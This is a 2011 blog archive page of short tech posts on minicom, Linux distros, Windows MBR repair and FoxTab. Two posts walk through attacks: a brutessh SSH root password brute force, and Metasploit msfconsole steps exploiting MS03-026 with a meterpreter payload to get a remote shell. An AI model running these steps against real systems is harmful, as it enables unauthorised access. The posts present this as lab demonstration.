
Showing posts from June, 2011

Using minicom

How to use minicom to access router's console. Steps: 1) Connect one end of the rollover cable to the console port of the router and the other to the com port of the computer. 2)Open the terminal 3)type minicom -o -s 4)then a configuration dialog box opens select the serial port setup. 5)The have the settings as: Serial Device: /dev/ttyS0 Lockfile Location: /var/lock Callin Program: Callout Program: Bps/Par/Bits:9600 8N1 Hardare Flow Control: Yes Software Flow Control: No 6) Select the setup as option to save with a name for example test 7) then exit 8) Now start minicom with minicom -o test 9) Finally you get the console accessed using minicom

Brutessh Attack Demo

This is just an educational demo of how a brutessh attack is done to get ssh access from remote machine, this is a bruteforce attack so may take long time or no time, its uncertain. And you may get pass or not depending upon how much footprinting you did to create the passwordlist.Here I have the attacking machine with backtrack5(revolution) and the target machine is running OpenBSD ( For this purpose I just have created my own custom mypasswordlist.txt which needs to be prepared by footprinting and enumeration. And for my purpose I have taken the root account you may check for the various accounts.The steps involved for this attack are as follows: 1)Fire up your gnome-terminal 2)and goto to your brutessh folder, just type ./brutessh -h -u root -d mypasswordlist.txt 3)and you'll see the passwords revealed. 4)then you can ssh with the password revealed you'll access the target remotely. Check out the  video  in  yo...

Remote Access Computer [Armitage]

This is just for a demo of how I used metasploit for accessing a remote computer with windows 2003 server ( in my lan. It's all done in the commandline interface using metasploit. You can check the embeded video which demonstrates how one can do the very same using armitage (GUI too) with metasploit in bactrack5 (revolution). It's just for educational purpose. Don't use this for any wrong intentions. Let me tell that it works in unpatched systems like windows xp, windows server2003, etc. It doesn't work for the systems with the security patches applied like windows7. 1)open terminal  2)./msfconsole 3)show exploits 4)use msrpc_dcom_ms03_026 5)show payloads 6)set PAYLOAD win32_bind_meterpreter 7)show options 8)set RHOST  9)set RPORT 23 10)exploit 11)help 12) use -m process 13)help  14)execute 15)execute -f cmd -c 16)interact 1 17) voila you get access right there Check this  video  or click this  link .

Best Linux,Which and Why?

I went through lots of those facebook groups and pages. And even in talks with some of my fellas, I saw one question that was usually repeated everywhere. And that is, which is the best  linux  and why? So I thought of writing this article. According to me,  linux  itself is the best one. It is because  linux  is an  opensource movement. And always when the term opensource comes community comes. That is opensource means by the community for the community to the community. And of course this is the best thing, right? That's why  opensource  is like synonym to  freedom , the true  freedom . Well let me not go away talking about opensource . I need to be centralised in which  linux  is best and why. You can get lots of stuffs over the internet just go google it to know more about  opensource . What I believe is no  linux  distro can be said to be the best one.  Linux  being the best in itself, you ...

Press Ctrl+Alt+Del to restart

What if I get the error Ctrl+Alt+del Mbr compressed error at startup? --- Fix the Ctrl+alt+del mbr compressed error in windows 7 using the following steps: 1) Boot the computer from the windows 7 disk  2) Choose repair 3) goto command prompt and type the following commands:  a)chkdsk c: /r This runs the check disk program to detect and attempt to repair problems on one partition. For example, to repair the C: drive: b)bootrec /FixMbr Typically this is used if Windows doesn't start and you can't get to the safe mode menu. You might also replace the Master Boot Record (MBR) and boot sector if you suspect a virus infection. c)bootrec /FixBoot New Boot Sector - Insert a new Windows 7/Vista compatible boot sector. It will automatically insert the right type of sector for the file system type (NTFS, FAT32, etc. d)bootrec /RebuildBcd Rebuild BCD - Rebuild the Boot Configuration Data (BCD). The BCD controls which partition boots. This option will let you select which installa...

FoxTab 1.4.2b :: Getting Started

FoxTab is an addon to firefox that helps in switching between the open tabs quickly and easily. This has a very speculiar feel of 3D. Launching FoxTab is extremely easy and intuitive. So here's how to do it instantly: Option 1: Click on the FoxTab icon in your browser's toolbar (press ESC to exit) Option 2: Ctrl + Tab: Simply hold the Ctrl key pressed down and repeatedly hit the Tab key. To flip tabs backward, use Ctrl + Shift + Tab If you'll click on the FoxTab icon, FoxTab will be opened in Interactive Mode. In that mode, you get access to your top sites, recently closed tabs and currently opened tabs. While in Interactive mode, you can also set FoxTab's theme and layout. Besides you can have all the top sites docked on a single page and set it to be the homepage. To open the top sites view, open FoxTab and select [My Top Sites] from the top bar. By clicking on a thumbnail, its corresponding page will be opened (use middle click to open in new tab). How to add pages...